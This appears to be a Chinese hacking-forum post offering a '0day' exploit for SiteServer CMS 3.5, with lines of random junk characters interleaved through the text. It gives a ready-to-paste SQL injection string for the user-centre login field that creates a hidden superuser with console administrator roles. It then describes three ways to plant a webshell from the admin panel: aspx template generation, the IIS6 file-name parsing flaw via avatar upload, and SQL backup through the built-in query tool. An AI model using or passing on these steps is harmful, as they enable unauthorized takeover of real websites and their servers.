SiteServer CMS 0Day

admin

经测试秒杀最新的3.5版

5 z! r" k9 M  Q0 Z1 t* U, r+ istieserver官网:www.siteserver.cn
! ^2 z: y; H& D- V1 {+ s
5 a) `) C/ X1 X0 @4 |" Y, J4 e
3 T1 H# C. c9 r. h/ ?, k
, \/ \, D( r& `; I. R3 rEXP:
- l* d: M; c+ W' h
直接访问UserCenter/login.aspx
% {/ B9 N: \3 \

5 z6 {9 R( }7 Q" }" W  Q
用户名处输入：

1 J& z. V( l: S% i2 ]123'insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values('blue','VffSUZcBPo4=','Encrypted','i7jq4LwC25wKDoqHErBWaw==');insert into bairong_AdministratorsInRoles values('Administrator','blue');insert into bairong_AdministratorsInRoles values('RegisteredUser','blue');insert into bairong_AdministratorsInRoles values('ConsoleAdministrator','blue');--
+ L2 h. A: I4 s5 C& Y, g/ ~
0 t) _# Y8 S# e8 Q

( H4 _; V! ^5 C9 O密码为空，输入验证码后提交，既可向数据库中插入一个用户名为blue  密码为lanhai的超级用户。



! @+ Z+ l. C. S4 n9 p# ^" M. z之后再访问后台SiteServer/login.aspx用插入的用户登陆
2 Q1 `. A8 x8 P3 M


1 Z+ A  C# w" c8 y2 U# @$ E+ Q0 A  p后台拿webshell的三种方法：
7 T( i$ @) i( g+ h+ x: }  R: @7 r) |0 |, R
5 v  V4 h' V* l& w- B% g一、
% e3 ]4 A3 \4 }, F# u) n$ r
; v% S2 J; F1 X站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx
% [% _& T' R( y& d+ q& J1 x: D7 Z
二、
, a. m" ^& B" z3 ^- E
8 D$ L4 h$ w# K* E) P8 y成员权限-》添加用户-》用户名为：1.asp
9 n. ]% S: j, W9 W
2 v1 \0 O+ b, O" A  Z0 `http://127.0.0.1/usercenter/
7 B" b: N# `) @0 G; f( y0 i& l
用刚才添加的1.asp去登陆，进去之后上传个人头像，利用IIS6解析漏洞得webshell
, ~# h4 H* n- S
（ps：后台添加用户时不会验证是否含有非法字符）

三、

系统工具-》实用工具-》机器参数查看
  d: V) S6 T, x$ N可以看到数据库类型、名称，WEB路径
( M) N% G- D* R  x
: f$ h- |" I8 c( H6 d8 C' ^; b系统工具-》数据库工具-》SQL语句查询
, ^' _1 H$ Q: X9 I2 x这功能做的不错，直接就相当于一个查询分析器，什么回显都有，可以backup得webshell，或者利用sqlserver配置不当直接XXOO。

" s; |  l4 ~* B' c" C) Z